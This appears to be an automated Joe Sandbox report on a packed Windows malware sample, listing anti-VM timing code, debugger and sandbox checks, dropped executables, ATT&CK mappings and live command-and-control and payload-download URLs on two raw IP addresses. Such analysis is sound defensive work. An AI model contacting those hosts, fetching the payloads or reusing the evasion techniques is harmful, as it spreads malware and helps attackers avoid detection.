                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54409A2 second address: 54409FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a pushad 0x0000000b mov esi, edi 0x0000000d jmp 00007FA934C8B339h 0x00000012 popad 0x00000013 je 00007FA9A6770D00h 0x00000019 jmp 00007FA934C8B32Eh 0x0000001e test byte ptr [76FB6968h], 00000002h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FA934C8B337h 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54409FD second address: 5440A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA9347D66BFh 0x00000009 add eax, 78CC617Eh 0x0000000f jmp 00007FA9347D66C9h 0x00000014 popfd 0x00000015 push eax 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jne 00007FA9A62BC037h 0x00000020 pushad 0x00000021 push esi 0x00000022 pushad 0x00000023 popad 0x00000024 pop ebx 0x00000025 pushfd 0x00000026 jmp 00007FA9347D66C2h 0x0000002b jmp 00007FA9347D66C5h 0x00000030 popfd 0x00000031 popad 0x00000032 mov edx, dword ptr [ebp+0Ch] 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov di, B0EEh 0x0000003c pushfd 0x0000003d jmp 00007FA9347D66BFh 0x00000042 jmp 00007FA9347D66C3h 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440A99 second address: 5440A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440A9F second address: 5440AC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA9347D66C5h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440AC8 second address: 5440B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA934C8B331h 0x0000000f xchg eax, ebx 0x00000010 jmp 00007FA934C8B32Eh 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 mov cl, BBh 0x00000019 pushfd 0x0000001a jmp 00007FA934C8B333h 0x0000001f add ah, 0000001Eh 0x00000022 jmp 00007FA934C8B339h 0x00000027 popfd 0x00000028 popad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FA934C8B32Ah 0x00000033 or ah, 00000018h 0x00000036 jmp 00007FA934C8B32Bh 0x0000003b popfd 0x0000003c push ecx 0x0000003d pop edi 0x0000003e popad 0x0000003f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440B55 second address: 5440B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440B5B second address: 5440BBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B337h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FA934C8B336h 0x00000011 push dword ptr [ebp+14h] 0x00000014 jmp 00007FA934C8B330h 0x00000019 push dword ptr [ebp+10h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FA934C8B337h 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440BBE second address: 5440BD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66C4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440C18 second address: 5440C42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007FA934C8B32Eh 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov al, D7h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440C42 second address: 5440C7B instructions: 0x00000000 rdtsc 0x00000002 movsx edx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FA9347D66C2h 0x0000000d jmp 00007FA9347D66C5h 0x00000012 popfd 0x00000013 popad 0x00000014 mov esp, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440C7B second address: 5440C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440C7F second address: 5440C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440C83 second address: 5440C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440C89 second address: 5440C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66C1h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5450A9D second address: 5450AFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA934C8B331h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FA934C8B32Eh 0x00000015 mov ebp, esp 0x00000017 jmp 00007FA934C8B330h 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov edi, 5C441BE0h 0x00000025 movsx edi, si 0x00000028 popad 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0652 second address: 54D0658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0658 second address: 54D065C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A734EA instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8BEA7F instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AEE4EE instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSpecial instruction interceptor: First address: C234EA instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSpecial instruction interceptor: First address: A6EA7F instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSpecial instruction interceptor: First address: C9E4EE instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054C0E69 rdtsc 0_2_054C0E69
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\1000051000\2c422e6624.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7784Thread sleep time: -50025s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7808Thread sleep count: 35 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7808Thread sleep time: -70035s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7780Thread sleep time: -30015s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7792Thread sleep count: 31 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7792Thread sleep time: -62031s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760Thread sleep count: 249 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760Thread sleep time: -7470000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7796Thread sleep count: 31 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7796Thread sleep time: -62031s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7788Thread sleep time: -38019s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread delayed: delay time: 30000Jump to behavior
                    Source: explorti.exe, explorti.exe, 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2896830843.0000000001609000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: file.exe, 00000000.00000002.1702384952.0000000000A44000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1743583589.0000000000BF4000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1743939318.0000000000BF4000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054C0A4A Start: 054C0A19 End: 054C0A1F0_2_054C0A4A
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054C0E69 rdtsc 0_2_054C0E69
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 7_2_00A3645B mov eax, dword ptr fs:[00000030h]7_2_00A3645B
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 7_2_00A3A1C2 mov eax, dword ptr fs:[00000030h]7_2_00A3A1C2
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
                    Source: explorti.exe, explorti.exe, 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: }Program Manager
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 7_2_00A1D312 cpuid 7_2_00A1D312
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 7_2_00A1CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,7_2_00A1CB1A

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 1.2.explorti.exe.a00000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.explorti.exe.a00000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.explorti.exe.a00000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.850000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1702163974.0000000000851000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1743759400.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.1702733907.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1661714987.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1743489529.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1701960720.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.2334522484.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter
                    1
                    Scheduled Task/Job
                    12
                    Process Injection
                    11
                    Masquerading
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    DLL Side-Loading
                    1
                    Scheduled Task/Job
                    241
                    Virtualization/Sandbox Evasion
                    LSASS Memory741
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media12
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    12
                    Process Injection
                    Security Account Manager2
                    Process Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information
                    NTDS241
                    Virtualization/Sandbox Evasion
                    Distributed Component Object ModelInput Capture112
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing
                    LSA Secrets1
                    File and Directory Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials224
                    System Information Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1502480 Sample: file.exe Startdate: 01/09/2024 Architecture: WINDOWS Score: 100 30 Multi AV Scanner detection for domain / URL 2->30 32 Suricata IDS alerts for network traffic 2->32 34 Found malware configuration 2->34 36 8 other signatures 2->36 6 file.exe 5 2->6         started        10 explorti.exe 15 2->10         started        13 explorti.exe 2->13         started        process3 dnsIp4 18 C:\Users\user\AppData\Local\...\explorti.exe, PE32 6->18 dropped 20 C:\Users\...\explorti.exe:Zone.Identifier, ASCII 6->20 dropped 38 Detected unpacking (changes PE section rights) 6->38 40 Tries to evade debugger and weak emulator (self modifying code) 6->40 42 Tries to detect virtualization through RDTSC time measurements 6->42 44 Potentially malicious time measurement code found 6->44 15 explorti.exe 6->15         started        26 185.215.113.19, 49737, 80 WHOLESALECONNECTIONSNL Portugal 10->26 28 185.215.113.16, 49738, 80 WHOLESALECONNECTIONSNL Portugal 10->28 22 C:\Users\user\AppData\...\2c422e6624.exe, PE32 10->22 dropped 24 C:\Users\user\AppData\Local\...\random[1].exe, PE32 10->24 dropped 46 Hides threads from debuggers 10->46 48 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->48 50 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 10->50 file5 signatures6 process7 signatures8 52 Antivirus detection for dropped file 15->52 54 Multi AV Scanner detection for dropped file 15->54 56 Detected unpacking (changes PE section rights) 15->56 58 6 other signatures 15->58

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    file.exe100%AviraTR/Crypt.TPM.Gen
                    file.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\1000051000\2c422e6624.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe58%ReversingLabsWin32.Packed.Themida
                    C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe55%VirustotalBrowse
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://185.215.113.16/100%Avira URL Cloudphishing
                    http://185.215.113.16/steam/random.exeWindows100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.php100%Avira URL Cloudmalware
                    http://185.215.113.19/Vi9leo/index.phpQ100%Avira URL Cloudphishing
                    http://185.215.113.16/steam/random.exeta100%Avira URL Cloudphishing
                    http://185.215.113.16/steam/random.exe6522427f100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.php6100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.php24%VirustotalBrowse
                    http://185.215.113.16/steam/random.exeD100%Avira URL Cloudphishing
                    http://185.215.113.16/ws100%Avira URL Cloudphishing
                    http://185.215.113.16/steam/random.exe100%Avira URL Cloudphishing
                    http://185.215.113.16/steam/random.exe00100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.php618%VirustotalBrowse
                    http://185.215.113.16/ata100%Avira URL Cloudphishing
                    http://185.215.113.16/ws18%VirustotalBrowse
                    http://185.215.113.16/steam/random.exem32100%Avira URL Cloudphishing
                    http://185.215.113.16/steam/random.exe24%VirustotalBrowse
                    http://185.215.113.16/steam/random.exe5100%Avira URL Cloudphishing
                    http://185.215.113.16/steam/random.exe6522427f19%VirustotalBrowse
                    http://185.215.113.16/20%VirustotalBrowse
                    http://185.215.113.19/Vi9leo/index.phpQ3%VirustotalBrowse
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://185.215.113.19/Vi9leo/index.phptrue
                    • 24%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.16/explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 20%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.19/Vi9leo/index.phpQexplorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 3%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/steam/random.exeWindowsexplorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/steam/random.exetaexplorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/steam/random.exe6522427fexplorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 19%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.19/Vi9leo/index.php6explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 18%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/steam/random.exeDexplorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/wsexplorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 18%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/steam/random.exeexplorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 24%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/steam/random.exe00explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/ataexplorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/steam/random.exem32explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/steam/random.exe5explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    185.215.113.19
                    unknownPortugal
                    206894WHOLESALECONNECTIONSNLtrue
                    185.215.113.16
                    unknownPortugal
                    206894WHOLESALECONNECTIONSNLfalse
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1502480
                    Start date and time:2024-09-01 20:07:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 6s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:9
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@5/5@0/2
                    EGA Information:
                    • Successful, ratio: 25%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target explorti.exe, PID 4856 because there are no executed function
                    • Execution Graph export aborted for target explorti.exe, PID 4940 because there are no executed function
